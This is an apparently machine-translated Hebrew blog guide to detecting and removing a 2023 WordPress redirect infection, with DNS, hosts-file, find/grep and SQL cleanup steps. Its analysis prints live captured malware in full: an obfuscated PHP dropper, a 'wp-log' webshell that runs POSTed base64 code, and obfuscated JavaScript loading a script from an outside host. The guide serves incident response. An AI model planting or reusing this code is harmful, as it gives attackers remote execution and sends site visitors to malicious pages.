Fix Redirect WordPress Hack 2023 (הפניה מחדש של וירוס)

WordPress זו ללא ספק הפלטפורמה הנפוצה ביותר CMS (Content Management System) גם לבלוגים וגם לחנויות מקוונות למתחילים (עם המודול WooCommerce), מה שהופך אותו לממוקד ביותר על ידי התקפות מחשב (פריצה). אחת מפעולות הפריצה הנפוצות ביותר נועדה להפנות את האתר שנפגע לדפי אינטרנט אחרים. Redirect WordPress Hack 2023 היא תוכנה זדונית חדשה יחסית שיש לה השפעה של הפניית האתר כולו לדפי אינטרנט ספאם או שבתורה יכולה להדביק מחשבים של משתמשים.

אם האתר שלך התפתח ב WordPress מנותב לאתר אחר, סביר להניח שהוא הקורבן של פריצת ההפניה המפורסמת כבר.

במדריך זה תמצא את המידע הדרוש וטיפים שימושיים שבאמצעותם תוכל להסיר וירוס לאתר נגוע בהפניה מחדש WordPress Hack (Virus Redirect). דרך ההערות תוכלו לקבל מידע נוסף או לבקש עזרה.

זיהוי הווירוס שמפנה את האתרים WordPress

ירידה פתאומית ולא מוצדקת בתנועה לאתר, ירידה במספר ההזמנות (במקרה של חנויות מקוונות) או בהכנסות מפרסום הם הסימנים הראשונים שמשהו לא בסדר. מזהה"Redirect WordPress Hack 2023" (הפניה וירוס) יכולה להתבצע גם "ויזואלית" כאשר אתה פותח את האתר ואתה מופנה לדף אינטרנט אחר.

מניסיון, רוב תוכנות זדוניות באינטרנט תואמות לדפדפני אינטרנט: Chrome, Firefox, Edge, Opera. אם אתה משתמש במחשב Mac, הווירוסים האלה לא ממש נראים בדפדפן Safari. מערכת אבטחה מ Safari חסום בשקט את התסריטים הזדוניים האלה.

מה לעשות אם יש לך אתר נגוע בו Redirect WordPress Hack

אני מקווה שהצעד הראשון הוא לא להיכנס לפאניקה או למחוק את האתר. אפילו קבצים נגועים או וירוסים אין למחוק בהתחלה. הם מכילים מידע רב ערך שיכול לעזור לך להבין היכן פרצת האבטחה ומה השפיע על הנגיף. שיטת פעולה.

סגור את האתר לקהל הרחב.

איך סוגרים אתר וירוס למבקרים? הפשוט ביותר הוא להשתמש במנהל ה-DNS ולמחוק את ה-IP עבור "A" (שם הדומיין) או להגדיר IP לא קיים. לפיכך, מבקרי האתר יהיו מוגנים מכך redirect WordPress hack מה שעלול להוביל אותם לדפי אינטרנט של וירוסים או דואר זבל.

אם אתה משתמש CloudFlare כמנהל DNS, אתה נכנס לחשבון ומוחק את רשומות ה-DNS "A" עבור שם הדומיין. לפיכך, התחום המושפע מהווירוס יישאר ללא IP, ולא יהיה ניתן יותר לגשת אליו מהאינטרנט.

אתה מעתיק את ה-IP של האתר ו"נתב" אותו כך שרק אתה יכול לגשת אליו. מהמחשב שלך.

כיצד לשנות את ה-IP האמיתי של אתר אינטרנט במחשבים Windows?

השיטה משמשת לעתים קרובות לחסימת גישה לאתרים מסוימים על ידי עריכת קובץ ה"מארחים".

1. אתה פותח Notepad או עורך טקסט אחר (עם זכויות administrator) וערוך את הקובץ"hosts". זה ממוקם ב:

C:\Windows\System32\drivers\etc\hosts

2. בקובץ "מארחים", הוסף "מסלול" ל-IP האמיתי של האתר שלך. IP נמחק למעלה ממנהל ה-DNS.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. שמור את הקובץ וכנס לאתר בדפדפן.

אם האתר לא נפתח ולא עשית שום דבר לא בסדר בקובץ ה"מארחים", סביר להניח שזהו מטמון DNS.

כדי לנקות את מטמון ה-DNS במערכת הפעלה Windows, פתוח Command Prompt, שבו אתה מפעיל את הפקודה:

ipconfig /flushdns

כיצד לשנות את ה-IP האמיתי של אתר אינטרנט במחשבים Mac / Macסֵפֶר?

עבור משתמשי מחשב Mac זה קצת יותר פשוט לשנות את ה-IP האמיתי של אתר אינטרנט.

1. פתח את כלי השירות Terminal.

2. הפעל את שורת הפקודה (דורשת סיסמת מערכת להפעלה):

sudo nano /etc/hosts

3. זהה למחשבים Windows, הוסף את ה-IP האמיתי של הדומיין.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. שמור את השינויים. Ctrl+X (y).

לאחר "ניתוב", אתה האדם היחיד שיכול לגשת איתו לאתר הנגוע Redirect WordPress Hack.

גיבוי מלא לאתר - קבצים ומסד נתונים

גם אם הוא נגוע ב"redirect WordPress hack”, ההמלצה היא לבצע גיבוי כללי של האתר כולו. קבצים ומסד נתונים. ייתכן שתוכל גם לשמור עותק מקומי של שני הקבצים public / public_html כמו גם מסד הנתונים.

זיהוי של קבצים נגועים ואלה ששונו על ידי Redirect WordPress Hack 2023

קובצי היעד העיקריים של WordPress יש index.php (בשורש), header.php, index.php סי footer.php של הנושא WordPress נכסים. בדוק ידנית קבצים אלה וזיהוי קוד זדוני או סקריפט תוכנה זדונית.

בשנת 2023, וירוס של "Redirect WordPress Hack"להכניס index.php קוד של הטופס:

(אני לא ממליץ להפעיל את הקודים האלה!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

מפוענח, זה תסריט זדוני זה בעצם התוצאה של נגוע האתר WordPress. זה לא הסקריפט שמאחורי התוכנה הזדונית, זה הסקריפט שמאפשר לנתב מחדש את דף האינטרנט הנגוע. אם נפענח את הסקריפט למעלה, נקבל:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

כדי לזהות את כל הקבצים בשרת המכילים את הקוד הזה, כדאי שתהיה לך גישה SSH לשרת כדי להפעיל עליו בדיקת קבצים ושורות ניהול Linux.

מידע נוסף: איך לגלות אם הבלוג שלך נגוע או לא, בעזרת עזרה Google Search . (WordPress נגיף)

להלן שתי פקודות שבהחלט מועילות לזהות קבצים ששונו לאחרונה וקבצים המכילים קוד מסוים (מחרוזת).

איך אתה רואה על Linux קבצי PHP השתנו ב-24 השעות האחרונות או מסגרת זמן אחרת?

להזמין "find” הוא פשוט מאוד לשימוש ומאפשר התאמה אישית לקביעת פרק הזמן, הנתיב לחיפוש וסוג הקבצים.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

בפלט תקבל מידע על התאריך והשעה שבה הקובץ השתנה, הרשאות הכתיבה/קריאה/ביצוע (chmod) ולאיזו קבוצה/משתמש הוא שייך.

אם אתה רוצה לבדוק לפני יותר ימים, שנה את הערך "-mtime -1" או השתמש ב"-mmin -360" למשך דקות (6 שעות).

כיצד לחפש קוד (מחרוזת) בתוך קבצי PHP, Java?

שורת הפקודה "מצא" המאפשרת למצוא במהירות את כל קבצי PHP או Java המכילים קוד מסוים היא כדלקמן:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

הפקודה תחפש ותציג את הקבצים .php סי .js מכיל"uJjBRODYsU

בעזרת שתי הפקודות למעלה, תוכלו לגלות בקלות אילו קבצים שונו לאחרונה ואילו מכילים קוד תוכנה זדונית.

מסיר קוד זדוני מקבצים ששונו מבלי לפגוע בקוד הנכון. בתרחיש שלי, התוכנה הזדונית הוצבה לפני הפתיחה <head>.

בעת ביצוע פקודת ה"מצא" הראשונה, ניתן מאוד לגלות קבצים חדשים בשרת, שאינם שלך WordPress ולא לשים שם על ידך. קבצים השייכים לסוג וירוס Redirect WordPress Hack.

בתרחיש שחקרתי, קבצים בטופס "wp-log-nOXdgD.php". אלו הם קבצי "שרצים" המכילים גם קוד תוכנה זדונית המשמש את הנגיף לניתוב מחדש.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

המטרה של קבצים מסוג "wp-log-*” הוא להפיץ את וירוס הפריצה להפניה מחדש לאתרים אחרים המתארחים בשרת. זה קוד תוכנה זדונית מהסוג "webshell"מורכב מא סעיף בסיסי (בהם מוגדרים כמה משתנים מוצפנים) ו-o סעיף ביצוע דרכו מנסה התוקף לטעון ולהפעיל קוד זדוני במערכת.

אם יש משתנה POST בשם 'bh' והערך המוצפן שלו MD5 שווה ל "8f1f964a4b4d8d1ac3f0386693d28d03", אז מופיע הסקריפט כדי לכתוב את התוכן המוצפן base64 של משתנה אחר בשם 'b3' בקובץ זמני ולאחר מכן מנסה לכלול את הקובץ הזמני הזה.

אם יש משתנה POST או GET בשם 'tick', הסקריפט יגיב עם הערך MD5 של המחרוזת"885

כדי לזהות את כל הקבצים בשרת המכילים קוד זה, בחר מחרוזת משותפת, ולאחר מכן הרץ את הפקודה "find" (בדומה לזה שלמעלה). מחק את כל הקבצים המכילים קוד תוכנה זדונית זה.

ליקוי אבטחה מנוצל על ידי Redirect WordPress Hack

ככל הנראה וירוס ההפניה הזה מגיע דרך ניצול של משתמש הניהול WordPress או על ידי זיהוי א תוסף פגיע המאפשר הוספת משתמשים עם הרשאות של administrator.

עבור רוב האתרים שנבנו על הפלטפורמה WordPress זה אפשרי עריכת ערכת נושא או קבצי פלאגיןמממשק הניהול (Dashboard). לפיכך, אדם זדוני יכול להוסיף קוד תוכנה זדונית לקבצי הנושא כדי ליצור את הסקריפטים המוצגים למעלה.

דוגמה לקוד תוכנה זדונית כזו היא זו:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript מזוהה בכותרת הנושא WordPress, מיד לאחר פתיחת התווית <head>.

זה די קשה לפענח את ה-JavaScript הזה, אבל ברור שהוא מבצע שאילתות בכתובת אינטרנט אחרת, מהמקום שבו הוא ככל הנראה מביא סקריפטים אחרים כדי ליצור את הקבצים "wp-log-*" שעליו דיברתי למעלה.

מצא ומחק את הקוד הזה מכל הקבצים PHP מושפע.

עד כמה שיכולתי לדעת, הקוד הזה היה נוסף ידנית על ידי משתמש חדש עם הרשאות ניהול.

לכן, כדי למנוע הוספת תוכנות זדוניות מלוח המחוונים, עדיף להשבית את אפשרות העריכה WordPress ערכות נושא / תוספים מלוח המחוונים.

ערוך את הקובץ wp-config.php והוסיפו את השורות:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

לאחר ביצוע השינוי, אין משתמש WordPress לא תוכל עוד לערוך קבצים מלוח המחוונים.

בדוק משתמשים עם תפקיד של Administrator

להלן שאילתת SQL שבה תוכל להשתמש כדי לחפש משתמשים עם התפקיד של administrator בפלטפורמה WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

שאילתה זו תחזיר את כל המשתמשים בטבלה wp_users מי שהטיל את התפקיד של administrator. השאילתה מתבצעת גם עבור הטבלה wp_usermeta לחפש במטא 'wp_capabilities', שמכיל מידע על תפקידי משתמש.

שיטה נוספת היא לזהות אותם מ: Dashboard → Users → All Users → Administrator. עם זאת, ישנן שיטות שבאמצעותן ניתן להסתיר משתמש בחלונית לוח המחוונים. אז הדרך הטובה ביותר לראות משתמשים "Administrator"בשנת WordPress היא פקודת SQL למעלה.

במקרה שלי, זיהיתי במסד הנתונים את המשתמש בשם "wp-import-user". רמז למדי.

גם מכאן תוכלו לראות את התאריך והשעה של המשתמש WordPress נוצר. גם מזהה המשתמש חשוב מאוד מכיוון שהוא מחפש ביומני השרת. כך תוכל לראות את כל הפעילות של משתמש זה.

מחק משתמשים עם תפקיד של administrator מה שאתה לא יודע, אם כך לשנות סיסמאות לכל המשתמשים המנהליים. עורך, מחבר, Administrator.

שנה את הסיסמה של משתמש מסד הנתונים של SQL של האתר המושפע.

לאחר ביצוע שלבים אלה, ניתן להפעיל מחדש את האתר עבור כל המשתמשים.

עם זאת, זכור שמה שהצגתי למעלה הוא אחד מאלפי תרחישים שבהם אתר אינטרנט נגוע ב Redirect WordPress Hack בשנת 2023.

אם האתר שלך נדבק ואתה זקוק לעזרה או אם יש לך שאלות כלשהן, מדור ההערות פתוח.